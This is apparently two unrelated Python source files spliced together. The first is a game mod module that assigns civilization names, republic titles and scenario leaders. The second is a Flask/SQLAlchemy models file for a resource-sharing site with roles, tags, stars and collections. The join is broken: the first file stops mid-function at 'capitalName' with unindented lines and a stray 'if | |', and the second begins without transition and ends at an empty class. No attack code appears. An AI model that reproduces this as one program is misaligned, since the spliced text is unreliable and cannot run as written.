        iPortugal : "TXT_KEY_CIV_ARABIAN_NAME_PORTUGAL",
    },
    iTibet : {
        iChina : "TXT_KEY_CIV_TIBETAN_NAME_CHINA",
        iIndia : "TXT_KEY_CIV_TIBETAN_NAME_INDIA",
        iTurks : "TXT_KEY_CIV_TIBETAN_NAME_TURKS",
        iMongols : "TXT_KEY_CIV_TIBETAN_NAME_MONGOLIA",
    },
    iMoors : {
        iEgypt : "TXT_KEY_CIV_ARABIAN_NAME_EGYPT",
        iBabylonia : "TXT_KEY_CIV_ARABIAN_NAME_BABYLONIA",
        iPersia : "TXT_KEY_CIV_ARABIAN_NAME_PERSIA",
        iPhoenicia : "TXT_KEY_CIV_ARABIAN_NAME_CARTHAGE",
        iRome : "TXT_KEY_CIV_ARABIAN_NAME_ROME",
        iEthiopia : "TXT_KEY_CIV_ARABIAN_NAME_ETHIOPIA",
        iByzantium : "TXT_KEY_CIV_ARABIAN_NAME_BYZANTIUM",
        iArabia : "TXT_KEY_CIV_ARABIAN_NAME_ARABIA",
        iMoors : "TXT_KEY_CIV_ARABIAN_NAME_MOORS",
        iSpain : "TXT_KEY_CIV_ARABIAN_NAME_SPAIN",
        iPortugal : "TXT_KEY_CIV_ARABIAN_NAME_PORTUGAL",
    },
    iSpain : {
        iKhmer : "TXT_KEY_CIV_SPANISH_NAME_KHMER",
        iAztecs : "TXT_KEY_CIV_SPANISH_NAME_AZTECS",
        iMughals : "TXT_KEY_CIV_SPANISH_NAME_MUGHALS",
    },
    iFrance : {
        iKhmer : "TXT_KEY_CIV_FRENCH_NAME_KHMER",
        iMughals : "TXT_KEY_CIV_FRENCH_NAME_MUGHALS",
    },
    iEngland : {
        iKhmer : "TXT_KEY_CIV_ENGLISH_NAME_KHMER",
        iMughals : "TXT_KEY_CIV_ENGLISH_NAME_MUGHALS",
    },
    iRussia : {
        iPersia : "TXT_KEY_CIV_RUSSIAN_NAME_PERSIA",
    },
    iMongols : {
        iTurks : "TXT_KEY_CIV_MONGOL_NAME_TURKS"
    },
    iGermany : {
        iMoors : "TXT_KEY_CIV_GERMAN_NAME_MOORS",
    },
})
# Republic naming patterns: whether a civ's republican title uses
# "Republic of <name>" or "<adjective> Republic", per government flavour.
lRepublicOf = [iEgypt, iIndia, iChina, iPersia, iJapan, iEthiopia, iKorea, iVikings, iTurks, iTibet, iIndonesia, iKhmer, iHolyRome, iMali, iPoland, iMughals, iOttomans, iThailand]
lRepublicAdj = [iBabylonia, iRome, iMoors, iSpain, iFrance, iPortugal, iInca, iItaly, iAztecs, iArgentina]
lSocialistRepublicOf = [iMoors, iHolyRome, iBrazil, iVikings]
lSocialistRepublicAdj = [iPersia, iTurks, iItaly, iAztecs, iArgentina]
lPeoplesRepublicOf = [iIndia, iChina, iPolynesia, iJapan, iTibet, iIndonesia, iMali, iPoland, iMughals, iThailand, iCongo]
lPeoplesRepublicAdj = [iTamils, iByzantium, iMongols]
lIslamicRepublicOf = [iIndia, iPersia, iMali, iMughals]
# Minimum city (or territory) count before a civ's title upgrades to
# "Empire"; civs not listed presumably use a default threshold — confirm.
dEmpireThreshold = {
    iCarthage : 4,
    iIndonesia : 4,
    iKorea : 4,
    iRussia : 8,
    iHolyRome : 3,
    iGermany : 4,
    iItaly : 4,
    iInca : 3,
    iMongols : 8,
    iPoland : 3,
    iMoors : 3,
    iTibet : 2,
    iPolynesia : 3,
    iTamils : 3,
    iIran : 4,
}
# Religions that count as Christian for name-change purposes.
lChristianity = [iCatholicism, iOrthodoxy, iProtestantism]

# Civs that switch to their modern name on respawn / vassalage / conversion.
lRespawnNameChanges = [iHolyRome, iInca, iAztecs, iMali] # TODO: this should be covered by period
lVassalNameChanges = [iInca, iAztecs, iMughals] # TODO: this should be covered by period
lChristianityNameChanges = [iInca, iAztecs] # TODO: this should be covered by period
lColonies = [iMali, iEthiopia, iCongo, iAztecs, iInca, iMaya] # TODO: could be covered by more granular continental regions

# Replacement short names for civs after a name change is triggered.
dNameChanges = { # TODO: this should be covered by period
    iPhoenicia : "TXT_KEY_CIV_CARTHAGE_SHORT_DESC",
    iAztecs : "TXT_KEY_CIV_MEXICO_SHORT_DESC",
    iInca : "TXT_KEY_CIV_PERU_SHORT_DESC",
    iHolyRome : "TXT_KEY_CIV_AUSTRIA_SHORT_DESC",
    iMali : "TXT_KEY_CIV_SONGHAI_SHORT_DESC",
    iMughals : "TXT_KEY_CIV_PAKISTAN_SHORT_DESC",
    iVikings : "TXT_KEY_CIV_SWEDEN_SHORT_DESC",
    iMoors : "TXT_KEY_CIV_MOROCCO_SHORT_DESC",
}

# Matching adjectives for the name changes above.
dAdjectiveChanges = {
    iPhoenicia : "TXT_KEY_CIV_CARTHAGE_ADJECTIVE",
    iAztecs : "TXT_KEY_CIV_MEXICO_ADJECTIVE",
    iInca : "TXT_KEY_CIV_PERU_ADJECTIVE",
    iHolyRome : "TXT_KEY_CIV_AUSTRIA_ADJECTIVE",
    iMali : "TXT_KEY_CIV_SONGHAI_ADJECTIVE",
    iMughals : "TXT_KEY_CIV_PAKISTAN_ADJECTIVE",
    iVikings : "TXT_KEY_CIV_SWEDEN_ADJECTIVE",
    iMoors : "TXT_KEY_CIV_MOROCCO_ADJECTIVE",
}
# Starting leader per civ, one dict per scenario start date. Later entries
# only override the 3000 BC baseline where the leader differs.
# NOTE(review): despite the d-prefix this is a list of dicts, indexed by
# scenario — keep the name for compatibility with callers.
dStartingLeaders = [
    # 3000 BC
    {
        iEgypt : iRamesses,
        iIndia : iAsoka,
        iBabylonia : iSargon,
        iHarappa : iVatavelli,
        iChina : iQinShiHuang,
        iGreece : iPericles,
        iPersia : iCyrus,
        iCarthage : iHiram,
        iPolynesia : iAhoeitu,
        iRome : iJuliusCaesar,
        iMaya : iPacal,
        iJapan : iKammu,
        iTamils : iRajendra,
        iEthiopia : iEzana,
        iKorea : iWangKon,
        iByzantium : iJustinian,
        iVikings : iRagnar,
        iTurks : iBumin,
        iArabia : iHarun,
        iTibet : iSongtsen,
        iKhmer : iSuryavarman,
        iIndonesia : iDharmasetu,
        iMoors : iRahman,
        iSpain : iIsabella,
        iFrance : iCharlemagne,
        iEngland : iAlfred,
        iHolyRome : iBarbarossa,
        iRussia : iIvan,
        iNetherlands : iWillemVanOranje,
        iMali : iMansaMusa,
        iPoland : iCasimir,
        iPortugal : iAfonso,
        iInca : iHuaynaCapac,
        iItaly : iLorenzo,
        iMongols : iGenghisKhan,
        iAztecs : iMontezuma,
        iMughals : iTughluq,
        iOttomans : iMehmed,
        iThailand : iNaresuan,
        iCongo : iMbemba,
        iIran : iAbbas,
        iGermany : iFrederick,
        iAmerica : iWashington,
        iArgentina : iSanMartin,
        iMexico : iJuarez,
        iColombia : iBolivar,
        iBrazil : iPedro,
        iCanada : iMacDonald,
    },
    # 600 AD
    {
        iChina : iTaizong,
    },
    # 1700 AD
    {
        iChina : iHongwu,
        iIndia : iShahuji,
        iIran : iAbbas,
        iTamils : iKrishnaDevaRaya,
        iKorea : iSejong,
        iJapan : iOdaNobunaga,
        iTurks : iTamerlane,
        iVikings : iGustav,
        iSpain : iPhilip,
        iFrance : iLouis,
        iEngland : iVictoria,
        iHolyRome : iFrancis,
        iRussia : iPeter,
        iNetherlands : iWilliam,
        iPoland : iSobieski,
        iPortugal : iJoao,
        iMughals : iAkbar,
        iOttomans : iSuleiman,
        iGermany : iFrederick,
    }]
### Event handlers
@handler("GameStart")
def setup():
    """Initialise civ names and leaders for all major players at game start."""
    iScenario = scenario()
    if iScenario == i600AD:
        # China has already weathered turmoil before the 600 AD start.
        data.players[slot(iChina)].iAnarchyTurns += 3
    elif iScenario == i1700AD:
        data.players[slot(iEgypt)].iResurrections += 1
        # Vikings and Moors already use their later names by 1700 AD.
        for iCiv in [iVikings, iMoors]:
            checkNameChange(slot(iCiv))
            checkAdjectiveChange(slot(iCiv))
    for iPlayer in players.major():
        setDesc(iPlayer, peoplesName(iPlayer))
        if player(iPlayer).getNumCities() > 0:
            checkName(iPlayer)
        # Give AI civs that are alive or yet to be born their scenario leader.
        if (year(dBirth[iPlayer]) >= year() or player(iPlayer).getNumCities() > 0) and not player(iPlayer).isHuman():
            setLeader(iPlayer, startingLeader(iPlayer))
@handler("rebirth")
def onRebirth(iPlayer):
    # A rebirth is treated exactly like a resurrection for naming purposes.
    onRespawn(iPlayer)
@handler("resurrection")
def onResurrection(iPlayer):
    # Delegate to the shared respawn handling below.
    onRespawn(iPlayer)
def onRespawn(iPlayer):
    """Update counters, name, adjective and leader after a civ returns to life."""
    data.players[iPlayer].iResurrections += 1
    if civ(iPlayer) in lRespawnNameChanges:
        checkNameChange(iPlayer)
        checkAdjectiveChange(iPlayer)
    setDesc(iPlayer, defaultTitle(iPlayer))
    checkName(iPlayer)
    checkLeader(iPlayer)
@handler("vassalState")
def onVassalState(iMaster, iVassal):
    """Apply name/adjective changes when a civ becomes another's vassal."""
    iMasterCiv = civ(iMaster)
    iVassalCiv = civ(iVassal)
    if iVassalCiv in lVassalNameChanges:
        # Mughals only change name when vassalised by a European power.
        if iVassalCiv == iMughals and iMasterCiv not in dCivGroups[iCivGroupEurope]: return
        data.players[iVassal].iResurrections += 1
        checkNameChange(iVassal)
        checkAdjectiveChange(iVassal)
    checkName(iVassal)
@handler("playerChangeStateReligion")
def onPlayerChangeStateReligion(iPlayer, iReligion):
    """Rename civs whose identity changes upon converting to Christianity."""
    if is_minor(iPlayer):
        return
    if civ(iPlayer) in lChristianityNameChanges and iReligion in lChristianity:
        data.players[iPlayer].iResurrections += 1
        checkNameChange(iPlayer)
        checkAdjectiveChange(iPlayer)
    checkName(iPlayer)
@handler("revolution")
def onRevolution(iPlayer):
    """Refresh titles after a civics revolution (titles depend on government)."""
    if is_minor(iPlayer):
        return
    data.players[iPlayer].iAnarchyTurns += 1
    # Republican Mughals take their modern (Pakistan) name.
    if civ(iPlayer) == iMughals and isRepublic(iPlayer):
        checkNameChange(iPlayer)
    checkName(iPlayer)
    # Vassal titles can depend on the master's civics, so refresh them too.
    for iLoopPlayer in players.vassals(iPlayer):
        checkName(iLoopPlayer)
@handler("cityAcquired")
def onCityAcquired(iPreviousOwner, iNewOwner):
    # City counts feed the empire-threshold titles, so refresh both sides.
    checkName(iPreviousOwner)
    checkName(iNewOwner)
@handler("cityRazed")
def onCityRazed(city):
    # Losing a city can drop the owner below an empire threshold.
    checkName(city.getPreviousOwner())
@handler("cityBuilt")
def onCityBuilt(city):
    # Gaining a city can push the owner over an empire threshold.
    checkName(city.getOwner())
@handler("periodChange")
def onPeriodChange(iPlayer, iPeriod):
    """Switch or revert a civ's name/adjective when its historical period changes."""
    iCiv = civ(iPlayer)
    if iCiv == iPhoenicia:
        if iPeriod == iPeriodCarthage:
            checkNameChange(iPlayer)
            checkAdjectiveChange(iPlayer)
    if iCiv == iVikings:
        # Vikings split into three successor identities, set directly here
        # rather than via dNameChanges (which only holds the Sweden variant).
        if iPeriod == iPeriodDenmark:
            setShort(iPlayer, text("TXT_KEY_CIV_DENMARK_SHORT_DESC"))
            setAdjective(iPlayer, text("TXT_KEY_CIV_DENMARK_ADJECTIVE"))
        elif iPeriod == iPeriodNorway:
            setShort(iPlayer, text("TXT_KEY_CIV_NORWAY_SHORT_DESC"))
            setAdjective(iPlayer, text("TXT_KEY_CIV_NORWAY_ADJECTIVE"))
        elif iPeriod == iPeriodSweden:
            setShort(iPlayer, text("TXT_KEY_CIV_SWEDEN_SHORT_DESC"))
            setAdjective(iPlayer, text("TXT_KEY_CIV_SWEDEN_ADJECTIVE"))
    if iCiv == iMoors:
        if iPeriod == iPeriodMorocco:
            checkNameChange(iPlayer)
            checkAdjectiveChange(iPlayer)
    if iCiv == iHolyRome:
        if iPeriod == iPeriodAustria:
            checkNameChange(iPlayer)
            checkAdjectiveChange(iPlayer)
    # A period of -1 means the civ left its special period entirely.
    if iPeriod == -1:
        revertNameChange(iPlayer)
        revertAdjectiveChange(iPlayer)
    checkName(iPlayer)
@handler("religionFounded")
def onReligionFounded(_, iPlayer):
    """Refresh the founder's title (religion can affect e.g. caliphate names)."""
    # Skip founding events fired during scenario setup.
    if turn() == scenarioStartTurn():
        return
    checkName(iPlayer)
@handler("BeginGameTurn")
def checkTurn(iGameTurn):
    """Periodically re-validate names and leaders (every 10 turns)."""
    if every(10):
        for iPlayer in players.major():
            checkName(iPlayer)
            checkLeader(iPlayer)
def checkName(iPlayer):
    """Recompute and apply the player's full title if they are a live major civ."""
    if not player(iPlayer).isAlive(): return
    if is_minor(iPlayer): return
    if player(iPlayer).getNumCities() == 0: return
    setDesc(iPlayer, desc(iPlayer, title(iPlayer)))
def checkLeader(iPlayer):
    """Recompute and apply the player's current leader and leader name."""
    if not player(iPlayer).isAlive(): return
    if is_minor(iPlayer): return
    setLeader(iPlayer, leader(iPlayer))
    setLeaderName(iPlayer, leaderName(iPlayer))
### Setter methods for player object ###
def setDesc(iPlayer, sName):
    """Set the player's full civilization description, best-effort.

    Name updates are cosmetic, so engine failures (e.g. encoding issues in a
    localised name) must never interrupt the game.
    """
    try:
        player(iPlayer).setCivDescription(sName)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; all ordinary errors stay swallowed as before.
        pass
def setShort(iPlayer, sShort):
    """Set the player's short civilization name."""
    player(iPlayer).setCivShortDescription(sShort)
def setAdjective(iPlayer, sAdj):
    """Set the player's civilization adjective."""
    player(iPlayer).setCivAdjective(sAdj)
def setLeader(iPlayer, iLeader):
    """Switch the player's leader, skipping no-ops.

    NOTE(review): `if not iLeader` also rejects a leader id of 0 — confirm
    that 0 is never a valid leader index.
    """
    if not iLeader: return
    if player(iPlayer).getLeader() == iLeader: return
    player(iPlayer).setLeader(iLeader)
def setLeaderName(iPlayer, sName):
    """Override the displayed leader name if it differs from the current one."""
    if not sName: return
    if infos.leader(player(iPlayer)).getText() != sName:
        player(iPlayer).setLeaderName(sName)
### Utility methods ###
def key(iPlayer, sSuffix):
    """Build the civ text key "TXT_KEY_CIV_<SHORTNAME>_<SUFFIX>" for iPlayer.

    A falsy suffix yields the bare "TXT_KEY_CIV_<SHORTNAME>" key.
    """
    if sSuffix: sSuffix = "_%s" % sSuffix
    # short() already returns a string, so the former redundant str(...)
    # wrapper around the replace/upper chain has been dropped.
    return "TXT_KEY_CIV_%s%s" % (short(iPlayer).replace(" ", "_").upper(), sSuffix)
def desc(iPlayer, sTextKey="%s1"):
    """Resolve a title text key with the player's name and adjective.

    Vassals additionally pass their master's name and adjective so keys of
    the form "X of Y" can be filled in.

    NOTE(review): the default "%s1" (formerly the redundant str("%s1"))
    looks like a placeholder — confirm callers always supply a real key.
    """
    if team(iPlayer).isAVassal():
        return text(sTextKey, name(iPlayer), adjective(iPlayer), name(iPlayer, True), adjective(iPlayer, True))
    return text(sTextKey, name(iPlayer), adjective(iPlayer))
def capitalName(iPlayer):
capital = player(iPlayer).getCapitalCity()
if | |
# -*- coding: utf-8 -*-
"""
:author: Kleon
:url: https://github.com/kleon1024
"""
from datetime import datetime
from enum import Enum
from werkzeug.security import generate_password_hash, check_password_hash
from .extensions import db, whooshee
from .common import merge
import json
# Length of hex digests stored for hashed fields.
DIGEST_LENGTH = 64
# Largest representable 24-bit RGB color value.
COLOR_MAX = int("0xffffff", 16)

def to_dict(self):
    """Serialise a model row to a plain dict of its column values."""
    return {c.name: getattr(self, c.name, None) for c in self.__table__.columns}

@property
def s(self):
    # Shorthand serialisation property; models may override with richer dicts.
    return self.to_dict()

# Monkey-patch both helpers onto every SQLAlchemy model.
db.Model.to_dict = to_dict
db.Model.s = s
class Order(Enum):
    """Sort orders accepted by listing endpoints."""
    time_desc = "time_desc"
    time_asc = "time_asc"
class UserRoles:
    """Canonical role names, matching Role rows created by Role.init_role()."""
    LOCKED = "Locked"
    USER = "User"
    MODERATOR = "Moderator"
    ADMINISTRATOR = "Administrator"
class Permissions:
    """Canonical permission names, matching Permission rows seeded by Role.init_role()."""
    FOLLOW = "FOLLOW"
    COLLECT = "COLLECT"
    COMMENT = "COMMENT"
    UPLOAD = "UPLOAD"
    MODERATE = "MODERATE"
    ADMINISTER = "ADMINISTER"
# Association table for the many-to-many Role <-> Permission relationship.
roles_permissions = db.Table(
    "roles_permissions",
    db.Column("role_id", db.Integer, db.ForeignKey("role.id")),
    db.Column("permission_id", db.Integer, db.ForeignKey("permission.id")),
)
class Role(db.Model):
    """A user role grouping a set of permissions."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30), unique=True)
    permissions = db.relationship(
        "Permission", secondary=roles_permissions, back_populates="roles"
    )
    users = db.relationship("User", back_populates="role")

    @staticmethod
    def init_role():
        """Seed (or re-sync) the role/permission tables; idempotent."""
        roles_permissions_map = {
            "Locked": ["FOLLOW", "COLLECT"],
            "User": ["FOLLOW", "COLLECT", "COMMENT", "UPLOAD"],
            "Moderator": ["FOLLOW", "COLLECT", "COMMENT", "UPLOAD", "MODERATE"],
            "Administrator": [
                "FOLLOW",
                "COLLECT",
                "COMMENT",
                "UPLOAD",
                "MODERATE",
                "ADMINISTER",
            ],
        }
        for role_name in roles_permissions_map:
            role = Role.query.filter_by(name=role_name).first()
            if role is None:
                role = Role(name=role_name)
                db.session.add(role)
            # Reset and rebuild so removed permissions are dropped as well.
            role.permissions = []
            for permission_name in roles_permissions_map[role_name]:
                permission = Permission.query.filter_by(name=permission_name).first()
                if permission is None:
                    permission = Permission(name=permission_name)
                    db.session.add(permission)
                role.permissions.append(permission)
        db.session.commit()

    def __repr__(self):
        return "<Role %r>" % self.name
class Permission(db.Model):
    """A single named capability that roles can grant."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30), unique=True)
    roles = db.relationship(
        "Role", secondary=roles_permissions, back_populates="permissions"
    )

    def __repr__(self):
        return "<Permission %r>" % self.name
class Classify(db.Model):
    """Association object linking a MediaType to a ResourceType, with
    localized display names for the combination."""
    classified_id = db.Column(
        db.Integer, db.ForeignKey("media_type.id"), primary_key=True
    )
    classifier_id = db.Column(
        db.Integer, db.ForeignKey("resource_type.id"), primary_key=True
    )
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    classified = db.relationship(
        "MediaType",
        foreign_keys=[classified_id],
        back_populates="classifiers",
        lazy="joined",
    )
    classifier = db.relationship(
        "ResourceType",
        foreign_keys=[classifier_id],
        back_populates="classifieds",
        lazy="joined",
    )
    # Localized names for this media/resource pairing.
    name_zh_cn = db.Column(db.String)
    name_en_us = db.Column(db.String)

    @property
    def s(self):
        # Flatten both sides of the association into one serialisable dict.
        d = self.to_dict()
        d["resource_id"] = self.classifier_id
        d["resource_name"] = self.classifier.name
        d["resource"] = self.classifier.s
        d["media_id"] = self.classified_id
        d["media_name"] = self.classified.name
        d["media"] = self.classified.s
        return d
class MediaType(db.Model):
    """Delivery medium of a resource."""
    id = db.Column(db.Integer, primary_key=True)
    # Media Type: Article/Video/Audio/Image/VR/AR/offline
    name = db.Column(db.String)
    name_zh_cn = db.Column(db.String)
    name_en_us = db.Column(db.String)
    resources = db.relationship("Resource", back_populates="media_type")
    classifiers = db.relationship(
        "Classify", back_populates="classified", lazy="dynamic", cascade="all"
    )

    def __repr__(self):
        return "<MediaType %r>" % self.name
class ResourceType(db.Model):
    """Semantic category of a resource."""
    id = db.Column(db.Integer, primary_key=True)
    # Resource Type:
    #   Internal: QA/Tutorial/Experience/Project/Record/Example/Quiz/Problem
    #   External: Quora/Blog/Podcast/Course/Book/Music/Movie
    name = db.Column(db.String)
    name_zh_cn = db.Column(db.String)
    name_en_us = db.Column(db.String)
    resources = db.relationship("Resource", back_populates="resource_type")
    classifieds = db.relationship(
        "Classify", back_populates="classifier", lazy="dynamic", cascade="all"
    )

    def __repr__(self):
        return "<ResourceType %r>" % self.name
class Status(db.Model):
    """Workflow status for moderation reports (e.g. open/resolved)."""
    id = db.Column(db.Integer, primary_key=True)
    status = db.Column(db.String, unique=True)
    reports = db.relationship("Report", back_populates="status")
class Report(db.Model):
    """A user's moderation report against a resource.

    NOTE(review): id, reported_id and reporter_id are all flagged
    primary_key, producing a three-column composite key — confirm that the
    surrogate id was meant to be part of the PK.
    """
    id = db.Column(db.Integer, primary_key=True)
    reported_id = db.Column(db.Integer, db.ForeignKey("resource.id"), primary_key=True)
    reporter_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    reported = db.relationship(
        "Resource",
        foreign_keys=[reported_id],
        back_populates="reporters",
        lazy="joined",
    )
    reporter = db.relationship(
        "User", foreign_keys=[reporter_id], back_populates="reporteds", lazy="joined"
    )
    description = db.Column(db.Text)
    status_id = db.Column(db.Integer, db.ForeignKey("status.id"))
    status = db.relationship("Status", back_populates="reports")
@whooshee.register_model("title")
class ResourceTag(db.Model):
    """A user-created tag attachable to resources (full-text indexed on title)."""
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String)
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    creator_id = db.Column(db.Integer, db.ForeignKey("user.id"))
    creator = db.relationship("User", back_populates="resource_tags")
    resources = db.relationship(
        "ResourceStick", back_populates="tag", lazy="dynamic", cascade="all"
    )

    def remove_all(self):
        """Delete this tag and every association that sticks it to a resource."""
        # Bulk-delete the association rows first, then the tag itself.
        self.resources.delete(synchronize_session=False)
        db.session.delete(self)
        db.session.commit()
class ResourceStick(db.Model):
    """Association object linking a Resource to a ResourceTag."""
    resource_id = db.Column(db.Integer, db.ForeignKey("resource.id"), primary_key=True)
    tag_id = db.Column(db.Integer, db.ForeignKey("resource_tag.id"), primary_key=True)
    resource = db.relationship(
        "Resource", foreign_keys=[resource_id], back_populates="tags", lazy="joined"
    )
    tag = db.relationship(
        "ResourceTag", foreign_keys=[tag_id], back_populates="resources", lazy="joined"
    )
class Resource(db.Model):
    """A learning resource (internal or external link) with type, tags and stars."""
    id = db.Column(db.Integer, primary_key=True)
    # title
    title = db.Column(db.String)
    # resource router
    url = db.Column(db.String, unique=True, index=True)
    # External resource with third-party url, which is considered as from web.
    # If this is declared as False, the resource must be declared as original.
    external = db.Column(db.Boolean, default=True)
    # Free resource, which must respect the copyright.
    free = db.Column(db.Boolean, default=True)
    # Resource Type
    resource_type = db.relationship("ResourceType", back_populates="resources")
    resource_type_id = db.Column(db.Integer, db.ForeignKey("resource_type.id"))
    # Media Type
    media_type = db.relationship("MediaType", back_populates="resources")
    media_type_id = db.Column(db.Integer, db.ForeignKey("media_type.id"))
    referencers = db.relationship(
        "Reference", back_populates="referenced", lazy="dynamic", cascade="all"
    )
    reporters = db.relationship(
        "Report", back_populates="reported", lazy="dynamic", cascade="all"
    )
    author_id = db.Column(db.Integer, db.ForeignKey("user.id"))
    author = db.relationship("User", back_populates="resources")
    create_time = db.Column(db.DateTime, default=datetime.utcnow)
    modify_time = db.Column(db.DateTime, default=datetime.utcnow)
    # Soft-delete flag; serialisers below collapse deleted rows to id+flag.
    deleted = db.Column(db.Boolean, default=False)
    collectors = db.relationship(
        "Star", back_populates="resource", lazy="dynamic", cascade="all"
    )
    tags = db.relationship(
        "ResourceStick", back_populates="resource", lazy="dynamic", cascade="all"
    )
    trackers = db.relationship(
        "ActionTracker", back_populates="resource", lazy="dynamic", cascade="all"
    )

    @property
    def s(self):
        """Serialise, hiding everything but id/deleted for soft-deleted rows."""
        if self.deleted:
            d = {"id": self.id, "deleted": self.deleted}
        else:
            d = self.to_dict()
            d["media_type"] = self.media_type.name
            d["resource_type"] = self.resource_type.name
        return d

    def ss(self, current_user):
        """Serialise with tag ids included.

        NOTE(review): current_user is unused here — possibly a leftover from
        a per-user view; kept for caller compatibility.
        """
        if self.deleted:
            d = {"id": self.id, "deleted": self.deleted}
        else:
            d = self.to_dict()
            d["media_type"] = self.media_type.name
            d["resource_type"] = self.resource_type.name
            d["tags"] = [t.tag_id for t in self.tags]
        return d

    def has_tag(self, tag):
        """Return True if this resource is already stuck with the given tag."""
        return self.tags.filter_by(tag_id=tag.id).first() is not None

    def add_tag(self, tag):
        """Attach the tag if not present; commits immediately."""
        if not self.has_tag(tag):
            s = ResourceStick(resource_id=self.id, tag_id=tag.id)
            db.session.add(s)
            db.session.commit()

    def remove_tag(self, tag):
        """Detach the tag if present; commits immediately."""
        s = self.tags.filter_by(tag_id=tag.id).first()
        if s is not None:
            db.session.delete(s)
            db.session.commit()
class Star(db.Model):
    """Association object recording that a user starred a resource."""
    resource_id = db.Column(db.Integer, db.ForeignKey("resource.id"), primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    resource = db.relationship(
        "Resource",
        foreign_keys=[resource_id],
        back_populates="collectors",
        lazy="joined",
    )
    user = db.relationship(
        "User", foreign_keys=[user_id], back_populates="stars", lazy="joined"
    )

    @property
    def s(self):
        # Only the star time is exposed; the linked rows serialise themselves.
        d = dict(star_time=self.timestamp)
        return d
@whooshee.register_model("description")
class Reference(db.Model):
    """Ordered link from a Collection to a Resource, with an optional note
    (full-text indexed on description)."""
    referenced_id = db.Column(
        db.Integer, db.ForeignKey("resource.id"), primary_key=True
    )
    referencer_id = db.Column(
        db.Integer, db.ForeignKey("collection.id"), primary_key=True
    )
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    # Position of the resource within the collection.
    order = db.Column(db.Integer)
    referenced = db.relationship(
        "Resource",
        foreign_keys=[referenced_id],
        back_populates="referencers",
        lazy="joined",
    )
    referencer = db.relationship(
        "Collection",
        foreign_keys=[referencer_id],
        back_populates="referenceds",
        lazy="joined",
    )
    description = db.Column(db.Text)
class CollectionType(db.Model):
    """Kind of a collection (e.g. list, thread, reply)."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    collections = db.relationship("Collection", back_populates="type")
    create_time = db.Column(db.DateTime, default=datetime.utcnow)
# Resource Collection
@whooshee.register_model("title", "description")
class Collection(db.Model):
    """A user-authored collection/post that references Resources.

    Collections form two self-referential trees: head/subjects (containment)
    and reply/repliers (threaded discussion).  Title and description are
    full-text indexed via whooshee.
    """
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String)
    description = db.Column(db.Text, default="")
    indicator = db.Column(db.String, default="")
    create_time = db.Column(db.DateTime, default=datetime.utcnow)
    modify_time = db.Column(db.DateTime, default=datetime.utcnow)
    author_id = db.Column(db.Integer, db.ForeignKey("user.id"))
    author = db.relationship("User", back_populates="collections")
    # Containment tree: a collection may be a subject of a "head" collection.
    head_id = db.Column(db.Integer, db.ForeignKey("collection.id"))
    head = db.relationship(
        "Collection",
        foreign_keys=[head_id],
        back_populates="subjects",
        remote_side=[id],
    )
    subjects = db.relationship(
        "Collection",
        foreign_keys=[head_id],
        back_populates="head",
        lazy="dynamic",
        cascade="all",
    )
    # Reply tree: threaded discussion between collections.
    reply_id = db.Column(db.Integer, db.ForeignKey("collection.id"))
    reply = db.relationship(
        "Collection",
        foreign_keys=[reply_id],
        back_populates="repliers",
        remote_side=[id],
    )
    repliers = db.relationship(
        "Collection",
        foreign_keys=[reply_id],
        back_populates="reply",
        lazy="dynamic",
        cascade="all",
    )
    # Ref to resource
    referenceds = db.relationship(
        "Reference", back_populates="referencer", lazy="dynamic", cascade="all"
    )
    # A post belongs to one domain, but a resource may belong to many with refs.
    domain_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
    domain = db.relationship("Domain", back_populates="collections")
    # comments = db.relationship('Comment', back_populates='post', cascade='all')
    collectors = db.relationship(
        "Collect", back_populates="collected", lazy="dynamic", cascade="all"
    )
    deleted = db.Column(db.Boolean, default=False)
    type_id = db.Column(db.Integer, db.ForeignKey("collection_type.id"))
    type = db.relationship("CollectionType", back_populates="collections")
    trackers = db.relationship(
        "ActionTracker", back_populates="collection", lazy="dynamic", cascade="all"
    )

    def ref(self, resources):
        """Replace this collection's references with the resource ids given.

        Duplicate ids are collapsed (first occurrence wins).  Deletions and
        additions are staged on the session but NOT committed here; a missing
        resource id aborts with 404 (get_or_404).
        """
        cur_res = Reference.query.filter_by(referencer_id=self.id).all()
        new_res = []
        for res in cur_res:
            db.session.delete(res)
        for res_id in resources:
            if res_id in new_res:
                continue
            new_res.append(res_id)
            res = Resource.query.get_or_404(res_id)
            ref = Reference(referenced_id=res.id, referencer_id=self.id)
            db.session.add(ref)

    def resource_indicators(self):
        """Return the distinct media-type names of referenced resources.

        Fix: the original accumulated names in a ``set`` and joined it, so
        the output order was nondeterministic between runs.  Names are now
        joined in first-seen order with duplicates (and unknown ids) dropped.
        """
        names = {1: "text", 2: "image", 3: "audio", 4: "video"}
        seen = []
        for ref in self.referenceds:
            name = names.get(ref.referenced.media_type_id, "")
            if name and name not in seen:
                seen.append(name)
        return "".join(seen)

    @property
    def s(self):
        """Serializable dict; deleted collections expose only id + flag."""
        if self.deleted:
            d = {}
            d["id"] = self.id
            d["deleted"] = self.deleted
        else:
            d = self.to_dict()
            # NOTE(review): raises AttributeError when self.domain is None —
            # confirm every live collection is guaranteed a domain.
            d["domain_title"] = self.domain.title
        return d
class Certify(db.Model):
    """Association object: a user certifying (moderating/vouching) a domain."""
    certifier_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
    certified_id = db.Column(db.Integer, db.ForeignKey("domain.id"), primary_key=True)
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    certifier = db.relationship(
        "User", foreign_keys=[certifier_id], back_populates="certifieds", lazy="joined"
    )
    certified = db.relationship(
        "Domain",
        foreign_keys=[certified_id],
        back_populates="certifiers",
        lazy="joined",
    )
class Aggregate(db.Model):
    """Ancestor/descendant edge between two domains (closure-table style).

    `distance` records how many hops separate the pair.
    """
